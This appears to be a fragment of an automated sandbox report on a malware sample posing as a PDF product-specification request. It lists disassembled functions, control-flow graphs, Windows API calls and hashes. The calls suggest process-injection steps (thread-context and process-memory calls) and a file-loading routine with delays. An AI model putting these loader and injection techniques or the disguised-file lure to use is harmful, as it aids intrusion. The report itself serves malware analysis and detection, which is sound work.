                                                                                                                  • Part of subcall function 00A42CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A42D94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: c9c08f2953fe98fd752b896d7737495627c0ae2b31e9a42328b696cbc52a44bb
                                                                                                                • Instruction ID: f2c4ccd3792ae12b85aeb079a44e721df0b0cdb6181109f544d82adcdee17bcf
                                                                                                                • Opcode Fuzzy Hash: c9c08f2953fe98fd752b896d7737495627c0ae2b31e9a42328b696cbc52a44bb
                                                                                                                • Instruction Fuzzy Hash: D0212874A02314ABDB10DFA9FC55AD9BFB4FB48B50F80842AE611A76A4DBB10540CF98

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 443 a43170-a43185 444 a431e5-a431e7 443->444 445 a43187-a4318a 443->445 444->445 448 a431e9 444->448 446 a4318c-a43193 445->446 447 a431eb 445->447 449 a43265-a4326d PostQuitMessage 446->449 450 a43199-a4319e 446->450 452 a82dfb-a82e23 call a418e2 call a5e499 447->452 453 a431f1-a431f6 447->453 451 a431d0-a431d8 DefWindowProcW 448->451 458 a43219-a4321b 449->458 455 a431a4-a431a8 450->455 456 a82e7c-a82e90 call aabf30 450->456 457 a431de-a431e4 451->457 488 a82e28-a82e2f 452->488 459 a4321d-a43244 SetTimer RegisterWindowMessageW 453->459 460 a431f8-a431fb 453->460 462 a82e68-a82e77 call aac161 455->462 463 a431ae-a431b3 455->463 456->458 481 a82e96 456->481 458->457 459->458 464 a43246-a43251 CreatePopupMenu 459->464 466 a82d9c-a82d9f 460->466 467 a43201-a43214 KillTimer call a430f2 call a43c50 460->467 462->458 471 a82e4d-a82e54 463->471 472 a431b9-a431be 463->472 464->458 474 a82da1-a82da5 466->474 475 a82dd7-a82df6 MoveWindow 466->475 467->458 471->451 484 a82e5a-a82e63 call aa0ad7 471->484 479 a431c4-a431ca 472->479 480 a43253-a43263 call a4326f 472->480 482 a82dc6-a82dd2 SetFocus 474->482 483 a82da7-a82daa 474->483 475->458 479->451 479->488 480->458 481->451 482->458 483->479 489 a82db0-a82dc1 call a418e2 483->489 484->451 488->451 492 a82e35-a82e48 call a430f2 call a43837 488->492 489->458 492->451
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A4316A,?,?), ref: 00A431D8
                                                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00A4316A,?,?), ref: 00A43204
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A43227
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A4316A,?,?), ref: 00A43232
                                                                                                                • CreatePopupMenu.USER32 ref: 00A43246
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00A43267
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: 691ef24a1f328504f23b8cfa8ce62cd975da7c365ec7cfef8c89fd62d8fb86f3
                                                                                                                • Instruction ID: 13d9e0c402d923ed15f5d99b829d51cda84dec42b1dcfba8abc03eb5e15322ed
                                                                                                                • Opcode Fuzzy Hash: 691ef24a1f328504f23b8cfa8ce62cd975da7c365ec7cfef8c89fd62d8fb86f3
                                                                                                                • Instruction Fuzzy Hash: C641783B200204BBDF146B7CAD09BF93B69EB91350F844626FB12872A5DBB09B41C765

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 499 141e2e0-141e38e call 141bce0 502 141e395-141e3bb call 141f1f0 CreateFileW 499->502 505 141e3c2-141e3d2 502->505 506 141e3bd 502->506 513 141e3d4 505->513 514 141e3d9-141e3f3 VirtualAlloc 505->514 507 141e50d-141e511 506->507 509 141e553-141e556 507->509 510 141e513-141e517 507->510 515 141e559-141e560 509->515 511 141e523-141e527 510->511 512 141e519-141e51c 510->512 516 141e537-141e53b 511->516 517 141e529-141e533 511->517 512->511 513->507 518 141e3f5 514->518 519 141e3fa-141e411 ReadFile 514->519 520 141e562-141e56d 515->520 521 141e5b5-141e5ca 515->521 524 141e54b 516->524 525 141e53d-141e547 516->525 517->516 518->507 526 141e413 519->526 527 141e418-141e458 VirtualAlloc 519->527 528 141e571-141e57d 520->528 529 141e56f 520->529 522 141e5da-141e5e2 521->522 523 141e5cc-141e5d7 VirtualFree 521->523 523->522 524->509 525->524 526->507 530 141e45a 527->530 531 141e45f-141e47a call 141f440 527->531 532 141e591-141e59d 528->532 533 141e57f-141e58f 528->533 529->521 530->507 539 141e485-141e48f 531->539 535 141e5aa-141e5b0 532->535 536 141e59f-141e5a8 532->536 534 141e5b3 533->534 534->515 535->534 536->534 540 141e491-141e4c0 call 141f440 539->540 541 141e4c2-141e4d6 call 141f250 539->541 540->539 547 141e4d8 541->547 548 141e4da-141e4de 541->548 547->507 549 141e4e0-141e4e4 CloseHandle 548->549 550 141e4ea-141e4ee 548->550 549->550 551 141e4f0-141e4fb VirtualFree 550->551 552 141e4fe-141e507 550->552 551->552 552->502 552->507
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0141E3B1
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0141E5D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 204039940-0
                                                                                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                • Instruction ID: b5160a52f5b2d118192514b450567c0c90ea2430d89710878960593e4877039f
                                                                                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                • Instruction Fuzzy Hash: B1A13974E00209EBDB15CFE4C894BEEBBB5BF48304F20815AE605BB295E7759A41CF94

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 563 a42c63-a42cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A42C91
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A42CB2
                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A41CAD,?), ref: 00A42CC6
                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A41CAD,?), ref: 00A42CCF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: c9dc948883d48c1392910afa35b43cfcd7817105bd4ef61bea6a46fe5acd8ab5
                                                                                                                • Instruction ID: 3533678a588dedeeeabdc128564e033c37b917a4b037d7f9865646659a89c2bf
                                                                                                                • Opcode Fuzzy Hash: c9dc948883d48c1392910afa35b43cfcd7817105bd4ef61bea6a46fe5acd8ab5
                                                                                                                • Instruction Fuzzy Hash: DAF03A755402907AEB30071BBC08EB77EBDE7C7F60B90851AFA10A36A4DA610841DAB8

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 678 141e090-141e1d4 call 141bce0 call 141df80 CreateFileW 685 141e1d6 678->685 686 141e1db-141e1eb 678->686 687 141e28b-141e290 685->687 689 141e1f2-141e20c VirtualAlloc 686->689 690 141e1ed 686->690 691 141e210-141e227 ReadFile 689->691 692 141e20e 689->692 690->687 693 141e229 691->693 694 141e22b-141e265 call 141dfc0 call 141cf80 691->694 692->687 693->687 699 141e281-141e289 ExitProcess 694->699 700 141e267-141e27c call 141e010 694->700 699->687 700->699
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0141DF80: Sleep.KERNELBASE(000001F4), ref: 0141DF91
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0141E1CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: DV8B53ZSDO1G5ERI6AUF
                                                                                                                • API String ID: 2694422964-901305683
                                                                                                                • Opcode ID: a25d600b78d1027ecd8ca45f21d01d98a18ac84e603ebb5a93b2083d1d8bec4c
                                                                                                                • Instruction ID: c9cae55284a1f41560d2add140136bd527ed19116ada8e9708d8be62191e8c0a
                                                                                                                • Opcode Fuzzy Hash: a25d600b78d1027ecd8ca45f21d01d98a18ac84e603ebb5a93b2083d1d8bec4c
                                                                                                                • Instruction Fuzzy Hash: E2519334E04248DBEF12DBA4C854BEFBB75AF18700F004599E649BB2D1D7BA0B45CB65

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 702 a72df8-a72e0f GetLastError 703 a72e11-a72e1b call a7320e 702->703 704 a72e1d-a72e24 call a74c7d 702->704 703->704 709 a72e6e-a72e75 SetLastError 703->709 708 a72e29-a72e2f 704->708 710 a72e31 708->710 711 a72e3a-a72e48 call a73264 708->711 712 a72e77-a72e7c 709->712 713 a72e32-a72e38 call a729c8 710->713 717 a72e4d-a72e63 call a72be6 call a729c8 711->717 718 a72e4a-a72e4b 711->718 721 a72e65-a72e6c SetLastError 713->721 717->709 717->721 718->713 721->712
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00A6F2DE,00A73863,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6), ref: 00A72DFD
                                                                                                                • _free.LIBCMT ref: 00A72E32
                                                                                                                • _free.LIBCMT ref: 00A72E59
                                                                                                                • SetLastError.KERNEL32(00000000,00A41129), ref: 00A72E66
                                                                                                                • SetLastError.KERNEL32(00000000,00A41129), ref: 00A72E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                • Opcode ID: 170f72bd4ce81957cce1f1646969f272e66699f5cc6346ae93499f587d0db948
                                                                                                                • Instruction ID: f37ee0f7af460c2b97d78312eb3b09615f4cb332fb3312743fae737b6dfb851b
                                                                                                                • Opcode Fuzzy Hash: 170f72bd4ce81957cce1f1646969f272e66699f5cc6346ae93499f587d0db948
                                                                                                                • Instruction Fuzzy Hash: 8601F4322056007BCA1267746D45F6B2E6DABE53B1B65C129F82DA22E3EF648C414320

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 761 a43b1c-a43b27 762 a43b99-a43b9b 761->762 763 a43b29-a43b2e 761->763 765 a43b8c-a43b8f 762->765 763->762 764 a43b30-a43b48 RegOpenKeyExW 763->764 764->762 766 a43b4a-a43b69 RegQueryValueExW 764->766 767 a43b80-a43b8b RegCloseKey 766->767 768 a43b6b-a43b76 766->768 767->765 769 a43b90-a43b97 768->769 770 a43b78-a43b7a 768->770 771 a43b7e 769->771 770->771 771->767
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A43B0F,SwapMouseButtons,00000004,?), ref: 00A43B40
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A43B0F,SwapMouseButtons,00000004,?), ref: 00A43B61
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00A43B0F,SwapMouseButtons,00000004,?), ref: 00A43B83
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125

                                                                                                                Control-flow Graph
                                                                                                                [Graph not recovered; API call nodes: CreateProcessW, Wow64GetThreadContext, ReadProcessMemory, Wow64SetThreadContext]
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0141D73B
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0141D7D1
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0141D7F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                Strings
                                                                                                                • Variable must be of type 'Object'., xrefs: 00A932B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Variable must be of type 'Object'.
                                                                                                                • API String ID: 0-109567571
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A833A2
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A43A04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 2289894680-1585850449
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A60668
                                                                                                                  • Part of subcall function 00A632A4: RaiseException.KERNEL32(?,?,?,00A6068A,?,00B11444,?,?,?,?,?,?,00A6068A,00A41129,00B08738,00A41129), ref: 00A63304
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A60685
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: Unknown exception
                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AC82F5
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00AC82FC
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00AC84DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 146820519-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A41BF4
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A41BFC
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A41C07
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A41C12
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A41C1A
                                                                                                                  • Part of subcall function 00A41BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A41C22
                                                                                                                  • Part of subcall function 00A41B4A: RegisterWindowMessageW.USER32(00000004,?,00A412C4), ref: 00A41BA2
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A4136A
                                                                                                                • OleInitialize.OLE32 ref: 00A41388
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00A824AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986988660-0
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,00A785CC,?,00B08CC8,0000000C), ref: 00A78704
                                                                                                                • GetLastError.KERNEL32(?,00A785CC,?,00B08CC8,0000000C), ref: 00A7870E
                                                                                                                • __dosmaperr.LIBCMT ref: 00A78739
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2583163307-0
                                                                                                                APIs
                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A517F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Init_thread_footer
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 1385522511-4196123274
                                                                                                                APIs
                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00A82C8C
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                  • Part of subcall function 00A42DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A42DC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                • String ID: X
                                                                                                                • API String ID: 779396738-3081909835
                                                                                                                APIs
                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A43908
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_
                                                                                                                • String ID:
                                                                                                                • API String ID: 1144537725-0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00A4949C,?,00008000), ref: 00A45773
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00A4949C,?,00008000), ref: 00A84052
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                APIs
                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A4BB4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Init_thread_footer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1385522511-0
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0141D73B
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0141D7D1
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0141D7F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2948472770-0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A44E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E9C
                                                                                                                  • Part of subcall function 00A44E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A44EAE
